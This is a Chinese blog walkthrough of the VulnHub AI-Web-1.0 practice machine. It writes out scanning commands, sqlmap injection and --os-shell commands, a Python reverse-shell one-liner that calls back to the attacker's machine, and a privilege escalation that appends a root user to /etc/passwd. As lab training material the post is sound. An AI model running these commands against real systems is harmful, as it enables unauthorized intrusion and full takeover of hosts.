vulnhub靶机AI-Web-1.0小白渗透学习笔记

最新推荐文章于 2023-07-25 11:54:19 发布
最新推荐文章于 2023-07-25 11:54:19 发布
阅读量274 收藏
点赞数
分类专栏: 笔记 文章标签: 学习 笔记 网络安全 网络 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45885854/article/details/131170178
版权

靶机地址:192.168.43.130
kali地址:192.168.43.128

第一步、netdiscover收集IP地址

使用 netdiscover 二层发现工具扫描虚拟机同段地址即可,拥有主动和被动发现两种方式

netdiscover

在这里插入图片描述

第二步、使用nmap工具扫描开放的端口

nmap -sS -sV -A -n 192.168.43.130  //-sS 半开放扫描 -sV 发送tcp探测存活 -A 显示系统和版本 -n不进行dns解析

在这里插入图片描述

经过扫描发现开放了80端口,使用的中间件是Apache。

使用浏览器访问web发现并没有什么可用的信息。

在这里插入图片描述

第三步、使用目录扫描dirb工具扫一下网站目录

dirb http://192.168.43.130

通过扫描发现有几个文件其中有一个爬虫协议文件robots.txt
在这里插入图片描述
进入robots.txt文件发现有两个目录文件
在这里插入图片描述
对这里两个目录,进行一级和二级扫描发现存在php配置文件。在这里暴露了网站的根目录。

在这里插入图片描述
在这里插入图片描述

第四步、使用sqlmap进行sql注入

通过浏览器访问有权限访问,并且存在注入点手动测试以后,直接抓包看一下注入点
在这里插入图片描述
列出库

sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs //-u 指定链接 --data 通过POST发送的数据字符串 ,--dbs列出数据库

在这里插入图片描述
列出表名

sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables //-D指定数据库 --tables 列出表

在这里插入图片描述
查字段

sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser  --columns //-D 指定数据库 -T 指定表名 --coulumns 列出字段

在这里插入图片描述
把所有的字段都查以后并没有发现没有啥可以利用的信息于是尝试使用
sqlmap的–os-shell命令

第五步、反弹shell

os-shell执行条件有三个:
  1.网站必须是root权限
  2.网站的绝对路径已知(前面暴露的info.php文件已经拿到绝对路径)
  3.GPC为off(php主动转义的功能关闭)

sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell  //--level执行测试的等级(1-5,默认为1) --os-shell  交互式的操作系统的shell

直接使用发现有限,先输入4选择php然后在输入2自定义路径,在这里的路径是使用info.php文件里面拿到的绝对路径/home/www/html/web1x443290o2sdf92213/和 se3reTdir777/uploads/路径拼接起来的
在这里插入图片描述这里成功反弹回一个交互式命令

第六步、提权

这里由于重置网卡后靶机IP为192.168.233.129,
Kali的IP为192.168.233.130

于是用过python反弹shell并在卡里监听4567端口
先在kali上开启监听端口4567

nc -vlnp 4567

在kali上获取到shell窗口输入

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.233.130",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述
这一步成功获取到反弹了一个shell出来但是获取到的shell窗口使用起来很难受,于是使用python转换成交互式shell就舒服很多了

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
通过查看当前权限发现不是是www-data用户
在这里插入图片描述
发现当前用户不是root用户但是这个用户可以对/etc/passwd 文件进行读写权限
在这里插入图片描述
所以我们尝试添加一个用户来登录。

openssl passwd -1 -salt web1 123456   //用openssl生成用户,用户名为web1 ,密码为 123456

在这里插入图片描述

$1$web1$ZrYgDZgZpLlsnVlxUaZwh  //生成后/etc/passwd储存用户格式的文件

在这里插入图片描述

panda:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0:root:/root:/bin/bash  //写入/etc/passwd文件的格式

然后再来写入密码:

echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd

在这里插入图片描述
切换用户到我们刚刚自己创建的 web1
在这里插入图片描述
然后把我们刚刚成功创建的用户直接登录靶机即可。发现flag就在根目录下
在这里插入图片描述

永恒本疯狂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 376
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1233
AIweb2靶场渗透测试
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6111
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2550
AI-WEB-1.0 多方法渗透
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2378
AI-WEB-1.0靶机的简单攻略
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 918
vulnhub ai-web1.0
AI: Web: 1靶机-Walkthrough
ins1ght的博客
09-21 5646
AI: Web: 1靶机,中等难度。使用sqlmap进行webshell的上传,感觉个人的思路稍微有点乱,但这篇文章会让你有观看“现场直播”的感觉,我踩过的坑、犯的低级错误、我的选择,你都可以看到。我觉得一篇好的walkthrough不光应该让人看到“修葺”过的完美思路,使用的技术手段,还应该让人看到我犯过的错,我的选择过程。PS:信息收集是王道。Enjoy!!!
AIweb1靶场总结
胖虎的博客
11-03 447
aiweb1靶场总结
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1283
vulnhub靶机AI-Web-1.0渗透笔记
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 3995
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhubAI-Web-1.0
m_de_g的博客
04-27 606
linux。
Ai-web-1.0靶机中的骚操作
weixin_51692662的博客
11-05 320
sqlmap、反弹shell、passwd提权、Ai-web-1.0
vulnhub之DC9靶机
LainWith的博客
02-15 3377
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
Vulnhub靶场--AI-Web-1.0提权获取flag
qq_53830529的博客
05-16 636
vulnhub实战靶场中的AI-Web-1.0,使用两种SQL注入上传shell的方法,第一:SQLmap的--os-shell上传shell,第二:通过手动into outfile上传webshell。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值